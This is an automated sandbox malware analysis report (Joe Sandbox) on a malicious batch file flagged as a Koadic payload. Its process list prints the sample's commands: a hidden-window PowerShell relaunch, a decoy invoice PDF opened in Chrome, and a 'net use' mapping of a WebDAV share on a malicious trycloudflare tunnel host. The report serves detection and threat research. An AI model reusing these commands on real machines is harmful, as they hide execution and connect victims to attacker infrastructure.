Windows
Analysis Report
2h.bat
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
cmd.exe (PID: 7972 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\2h.ba t" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 7980 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 8152 cmdline:
powershell -windowst yle hidden -command "Start-Pro cess cmd - ArgumentLi st '/c \"C :\Users\us er\Desktop \2h.bat\" hidden' -W indowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9) cmd.exe (PID: 5036 cmdline:
"C:\Window s\system32 \cmd.exe" /c "C:\Use rs\user\De sktop\2h.b at" hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 5872 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) chrome.exe (PID: 1692 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --s tart-maxim ized --sin gle-argume nt https:/ /www.healy consultant s.com/wp-c ontent/upl oads/2013/ 08/draft-i nvoice-Ger many.pdf MD5: E81F54E6C1129887AEA47E7D092680BF) chrome.exe (PID: 2404 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --no-pre-r ead-main-d ll --field -trial-han dle=1852,i ,159141251 4752768327 0,51056687 8733152321 ,262144 -- disable-fe atures=Opt imizationG uideModelD ownloading ,Optimizat ionHints,O ptimizatio nHintsFetc hing,Optim izationTar getPredict ion --vari ations-see d-version= 20250306-1 83004.4290 00 --mojo- platform-c hannel-han dle=2060 / prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF) net.exe (PID: 1424 cmdline:
net use Z: "\\suppli er-murray- custody-tr easures.tr ycloudflar e.com@SSL\ DavWWWRoot " /user:yo ur-usernam e your-pas sword /per sistent:no MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) net.exe (PID: 4940 cmdline:
net use Z: /delete / yes MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MALWARE_BAT_KoadicBAT | Koadic post-exploitation framework BAT payload | ditekSHen |
|
System Summary |
---|
Source: | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-24T15:50:15.149265+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49722 | 104.16.231.132 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-24T15:50:15.942803+0100 | 1810005 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49722 | 104.16.231.132 | 443 | TCP |
2025-03-24T15:50:20.162097+0100 | 1810005 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49733 | 104.16.231.132 | 443 | TCP |
- • AV Detection
- • Compliance
- • Networking
- • System Summary
- • Data Obfuscation
- • Hooking and other Techniques for Hiding and Protection
- • Malware Analysis System Evasion
- • Anti Debugging
- • HIPS / PFW / Operating System Protection Evasion
- • Language, Device and Operating System Detection
- • Stealing of Sensitive Information
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Source: | Integrated Neural Analysis Model: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | DNS query to tunneling platform domain: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | Suricata IDS: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary |
---|
Source: | Matched rule: |
Source: | File created: | Jump to behavior |
Source: | File deleted: | Jump to behavior |
Source: | Matched rule: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Process created: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 PowerShell | 1 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 21 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 12 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | Virustotal | Browse | ||
11% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
healyconsultants.com | 162.159.134.42 | true | false | unknown | |
supplier-murray-custody-treasures.trycloudflare.com | 104.16.231.132 | true | true | unknown | |
www.google.com | 142.251.40.196 | true | false | high | |
www.healyconsultants.com | unknown | unknown | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
162.159.134.42 | healyconsultants.com | United States | 13335 | CLOUDFLARENETUS | false | |
142.251.40.196 | www.google.com | United States | 15169 | GOOGLEUS | false | |
104.16.231.132 | supplier-murray-custody-treasures.trycloudflare.com | United States | 13335 | CLOUDFLARENETUS | true |
IP |
---|
192.168.2.4 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1647126 |
Start date and time: | 2025-03-24 15:48:42 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 6s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 20 |
Number of new started drivers analysed: | 1 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2h.bat |
Detection: | MAL |
Classification: | mal76.spyw.winBAT@30/4@9/4 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis
(whitelisted): MpCmdRun.exe, m rxdav.sys, rundll32.exe, WMIAD AP.exe, SIHClient.exe, SgrmBro ker.exe, conhost.exe, svchost. exe - Excluded IPs from analysis (wh
itelisted): 184.31.69.3, 23.20 3.176.221, 199.232.210.172, 14 2.250.81.227, 142.250.80.110, 172.217.165.142, 172.253.115.8 4, 142.251.32.110, 142.251.40. 110, 142.250.80.78, 142.251.40 .238, 142.251.40.206, 142.251. 40.227, 142.251.32.99, 142.250 .80.46, 4.175.87.197 - Excluded domains from analysis
(whitelisted): clients1.googl e.com, fs.microsoft.com, accou nts.google.com, slscr.update.m icrosoft.com, ctldl.windowsupd ate.com, clientservices.google apis.com, fs-wildcard.microsof t.com.edgekey.net, fs-wildcard .microsoft.com.edgekey.net.glo balredir.akadns.net, e16604.ds cf.akamaiedge.net, fe3cr.deliv ery.mp.microsoft.com, clients2 .google.com, edgedl.me.gvt1.co m, ocsp.digicert.com, redirect or.gvt1.com, update.googleapis .com, clients.l.google.com, pr od.fs.microsoft.com.akadns.net , c.pki.goog - Not all processes where analyz
ed, report is missing behavior information - Report size getting too big, t
oo many NtOpenFile calls found . - Report size getting too big, t
oo many NtOpenKeyEx calls foun d. - Report size getting too big, t
oo many NtProtectVirtualMemory calls found. - Report size getting too big, t
oo many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
10:50:10 | API Interceptor | |
10:50:14 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
162.159.134.42 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook, PureLog Stealer | Browse |
| ||
Get hash | malicious | FormBook, PureLog Stealer | Browse |
| ||
Get hash | malicious | FormBook, PureLog Stealer | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Remcos, GuLoader | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | Remcos, GuLoader | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
28a2c9bd18a11de089ef85a160da29e4 | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | KnowBe4 | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | DanaBot | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
a0e9f5d64349fb13191bc781f81f42e1 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | DarkVision Rat | Browse |
| ||
Get hash | malicious | DarkVision Rat | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulLzc:NllU |
MD5: | D0D8DA475C24D98797D589D2BD9D83F9 |
SHA1: | 337DF4C8E968553F7845124876752AB668DC4038 |
SHA-256: | 557DD96F04E44166641933316B033DEC24AC0E5C7567D6DB1814CB821E026C0B |
SHA-512: | BE4E5C4551F8FF22349280446B6EBD3E4E6D88820B8F944962825A83259CFE6DD5BB24517C585F31E20EA6B3BD4F60A0ED94FCF89A95F3B881D61C4788C616F0 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
